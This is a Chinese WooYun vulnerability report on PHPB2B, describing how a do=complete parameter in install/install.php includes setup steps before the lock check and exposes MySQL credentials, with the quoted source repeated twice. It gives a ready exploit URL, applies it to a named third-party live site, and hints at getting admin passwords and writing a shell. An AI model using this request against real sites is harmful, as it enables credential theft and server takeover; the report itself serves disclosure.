当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090306

漏洞标题:PHPB2B某处漏洞直接查看mysql密码

相关厂商:phpb2b.com

漏洞作者: Th1nk

提交时间:2015-02-11 10:08

修复时间:2015-04-02 10:23

公开时间:2015-04-02 10:23

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-11: 细节已通知厂商并且等待厂商处理中
2015-02-16: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-04-12: 细节向核心白帽子及相关领域专家公开
2015-04-22: 细节向普通白帽子公开
2015-05-02: 细节向实习白帽子公开
2015-04-02: 细节向公众公开

简要描述:

PHPB2B某处漏洞直接查看mysql密码

详细说明:

PHPB2B某处漏洞直接查看mysql密码
官网下载的最新版
install/install.php
安装文件,查看下代码。

<?php
/**
 *      [PHPB2B] Copyright (C) 2007-2099, Ualink Inc. All Rights Reserved.
 *      The contents of this file are subject to the License; you may not use this file except in compliance with the License. 
 *
 *      @version $Revision: 2048 $
 */
session_start();
error_reporting(E_ERROR | E_NOTICE);
set_magic_quotes_runtime(0);
ini_set('magic_quotes_sybase', 0);
ini_set('max_execution_time', '300');
if (isset($_GET['act'])) {
        if($_GET['act'] == "phpinfo"){
                die(phpinfo());
        }
}
if (!defined('DIRECTORY_SEPARATOR')) {
        define('DIRECTORY_SEPARATOR','/');
}
define('DS', DIRECTORY_SEPARATOR);
define('TIME', time());
define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
define('PHPB2B_ROOT', substr(dirname(__FILE__), 0, -7));
define('MIN_PHP_VERSION', '5.0.0');
//define('JSMIN_AS_LIB', true); // prevents auto-run on include
require '../phpb2b_version.php';
require '../configs/config.inc.php';
require '../libraries/core/paths.php';
if (version_compare(PHP_VERSION, MIN_PHP_VERSION, '<')) {
    echo 'PHPB2B '. PHPB2B_VERSION. ' require php'. MIN_PHP_VERSION.', but your php version is ' . PHP_VERSION . ".\n";
    exit;
}
define('IN_PHPB2B',true);
if(!defined('LIB_PATH')) define('LIB_PATH',PHPB2B_ROOT.'libraries'.DS);
require '../libraries/global.func.php';
require '../libraries/func.sql.php';
require "../libraries/db_mysql.inc.php";
require "../libraries/core/object.php";
require "../libraries/core/controller.php";
require "../libraries/file.class.php";
require "../libraries/template.class.php";
require "../libraries/source/error.class.php";
list($accept_language) = explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']);
if(file_exists(PHPB2B_ROOT. 'languages'.DS.strtolower($accept_language).DS."global.csv")) {
        $app_lang = strtolower($accept_language);
}
if (!is_writable(PHPB2B_ROOT."data".DS)) {
        echo PHPB2B_ROOT."data".DS. " is not writeable.\n";
    exit;
}
if (!empty($_GET['app_lang'])) {
        $app_lang = $_GET['app_lang'];
}
if (!is_file(PHPB2B_ROOT."data".DS."language".DS.$app_lang.DS."default.conf")) {
        pb_configmake($app_lang);
}
if (!defined('CACHE_PATH')) {
        define('CACHE_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS);
        define('CACHE_LANG_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS);
        define('CACHE_COMMON_PATH', PHPB2B_ROOT."data".DS."cache".DS);
}
//language
$smarty = new TemplateEngines();
$sections = array('install', 'javascript');
//da($smarty);
$smarty->configLoad('default.conf', $sections);
$arrTemplate = $smarty->getConfigVars();
extract($arrTemplate);
//:~
$db = new DB_Sql();
$file_cls = new Files();
$pb_protocol = 'http';
if ( isset( $_SERVER['HTTPS'] ) && ( strtolower( $_SERVER['HTTPS'] ) != 'off' ) ) {
        $pb_protocol = 'https';
}
$PHP_SELF = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : preg_replace("/(.*)\.php(.*)/i", "\\1.php", $_SERVER['PHP_SELF']);
$BASESCRIPT = basename($PHP_SELF);
list($BASEFILENAME) = explode('.', $BASESCRIPT);
$install_url = htmlspecialchars($pb_protocol."://".pb_getenv('HTTP_HOST').preg_replace("/\/+(api|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/');
$siteUrl = substr($install_url,0,-(strlen($BASEFILENAME)+1));
$time_stamp = TIME;
if($_REQUEST)
{
        if(!MAGIC_QUOTES_GPC)
        {
                $_REQUEST = pb_addslashes($_REQUEST);
                if($_COOKIE) $_COOKIE = pb_addslashes($_COOKIE);
        }
        extract($_REQUEST, EXTR_SKIP);
}
if(!isset($_GET['step'])) {
        $step = '1';
}else{
        $step = intval($_GET['step']);
}
if (isset($_GET['do'])) {
        $do = trim($_GET['do']);
        if($do == "complete"){
                include "step".$step.".inc.php";
                exit;
        }
}
if(file_exists(PHPB2B_ROOT.'data/install.lock')) {
        $msg = L("install_locked", "tpl");
        Errors::showError($msg);
        exit;
}


只要传入do=complete就可以包含step文件
但是权限检测却在
104-108行

if(file_exists(PHPB2B_ROOT.'data/install.lock')) {
        $msg = L("install_locked", "tpl");
        Errors::showError($msg);
        exit;
}


这样的话,我们虽然不能重装,但是却可以拿到重要信息。比如mysql数据库账号密码!!
本机演示。
http://127.0.0.1/phpb2b/install/install.php?step=5&app_lang=zh-cn&do=complete

1.png


因为默认不删除install.php文件,也就是只要安装了phpb2b,那么肯定可以查看msyql密码了,如果开启了远程连接,或者phpmyadmin,直接拿后台密码、写入shell,各种你懂的。
因为官方删除了install文件夹,不能演示。网上随便找了个网站。
http://en.csjci.com/install/install.php?step=5&app_lang=zh-cn&do=complete

1.png


还是root呢~

漏洞证明:

PHPB2B某处漏洞直接查看mysql密码
官网下载的最新版
install/install.php
安装文件,查看下代码。

<?php
/**
 *      [PHPB2B] Copyright (C) 2007-2099, Ualink Inc. All Rights Reserved.
 *      The contents of this file are subject to the License; you may not use this file except in compliance with the License. 
 *
 *      @version $Revision: 2048 $
 */
session_start();
error_reporting(E_ERROR | E_NOTICE);
set_magic_quotes_runtime(0);
ini_set('magic_quotes_sybase', 0);
ini_set('max_execution_time', '300');
if (isset($_GET['act'])) {
        if($_GET['act'] == "phpinfo"){
                die(phpinfo());
        }
}
if (!defined('DIRECTORY_SEPARATOR')) {
        define('DIRECTORY_SEPARATOR','/');
}
define('DS', DIRECTORY_SEPARATOR);
define('TIME', time());
define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
define('PHPB2B_ROOT', substr(dirname(__FILE__), 0, -7));
define('MIN_PHP_VERSION', '5.0.0');
//define('JSMIN_AS_LIB', true); // prevents auto-run on include
require '../phpb2b_version.php';
require '../configs/config.inc.php';
require '../libraries/core/paths.php';
if (version_compare(PHP_VERSION, MIN_PHP_VERSION, '<')) {
    echo 'PHPB2B '. PHPB2B_VERSION. ' require php'. MIN_PHP_VERSION.', but your php version is ' . PHP_VERSION . ".\n";
    exit;
}
define('IN_PHPB2B',true);
if(!defined('LIB_PATH')) define('LIB_PATH',PHPB2B_ROOT.'libraries'.DS);
require '../libraries/global.func.php';
require '../libraries/func.sql.php';
require "../libraries/db_mysql.inc.php";
require "../libraries/core/object.php";
require "../libraries/core/controller.php";
require "../libraries/file.class.php";
require "../libraries/template.class.php";
require "../libraries/source/error.class.php";
list($accept_language) = explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']);
if(file_exists(PHPB2B_ROOT. 'languages'.DS.strtolower($accept_language).DS."global.csv")) {
        $app_lang = strtolower($accept_language);
}
if (!is_writable(PHPB2B_ROOT."data".DS)) {
        echo PHPB2B_ROOT."data".DS. " is not writeable.\n";
    exit;
}
if (!empty($_GET['app_lang'])) {
        $app_lang = $_GET['app_lang'];
}
if (!is_file(PHPB2B_ROOT."data".DS."language".DS.$app_lang.DS."default.conf")) {
        pb_configmake($app_lang);
}
if (!defined('CACHE_PATH')) {
        define('CACHE_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS);
        define('CACHE_LANG_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS);
        define('CACHE_COMMON_PATH', PHPB2B_ROOT."data".DS."cache".DS);
}
//language
$smarty = new TemplateEngines();
$sections = array('install', 'javascript');
//da($smarty);
$smarty->configLoad('default.conf', $sections);
$arrTemplate = $smarty->getConfigVars();
extract($arrTemplate);
//:~
$db = new DB_Sql();
$file_cls = new Files();
$pb_protocol = 'http';
if ( isset( $_SERVER['HTTPS'] ) && ( strtolower( $_SERVER['HTTPS'] ) != 'off' ) ) {
        $pb_protocol = 'https';
}
$PHP_SELF = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : preg_replace("/(.*)\.php(.*)/i", "\\1.php", $_SERVER['PHP_SELF']);
$BASESCRIPT = basename($PHP_SELF);
list($BASEFILENAME) = explode('.', $BASESCRIPT);
$install_url = htmlspecialchars($pb_protocol."://".pb_getenv('HTTP_HOST').preg_replace("/\/+(api|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/');
$siteUrl = substr($install_url,0,-(strlen($BASEFILENAME)+1));
$time_stamp = TIME;
if($_REQUEST)
{
        if(!MAGIC_QUOTES_GPC)
        {
                $_REQUEST = pb_addslashes($_REQUEST);
                if($_COOKIE) $_COOKIE = pb_addslashes($_COOKIE);
        }
        extract($_REQUEST, EXTR_SKIP);
}
if(!isset($_GET['step'])) {
        $step = '1';
}else{
        $step = intval($_GET['step']);
}
if (isset($_GET['do'])) {
        $do = trim($_GET['do']);
        if($do == "complete"){
                include "step".$step.".inc.php";
                exit;
        }
}
if(file_exists(PHPB2B_ROOT.'data/install.lock')) {
        $msg = L("install_locked", "tpl");
        Errors::showError($msg);
        exit;
}


只要传入do=complete就可以包含step文件
但是权限检测却在
104-108行

if(file_exists(PHPB2B_ROOT.'data/install.lock')) {
        $msg = L("install_locked", "tpl");
        Errors::showError($msg);
        exit;
}


这样的话,我们虽然不能重装,但是却可以拿到重要信息。比如mysql数据库账号密码!!
本机演示。
http://127.0.0.1/phpb2b/install/install.php?step=5&app_lang=zh-cn&do=complete

1.png


因为默认不删除install.php文件,也就是只要安装了phpb2b,那么肯定可以查看msyql密码了,如果开启了远程连接,或者phpmyadmin,直接拿后台密码、写入shell,各种你懂的。
因为官方删除了install文件夹,不能演示。网上随便找了个网站。
http://en.csjci.com/install/install.php?step=5&app_lang=zh-cn&do=complete

1.png


还是root呢~

修复方案:

过滤

版权声明:转载请注明来源 Th1nk@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-02 10:23

厂商回复:

最新状态:

暂无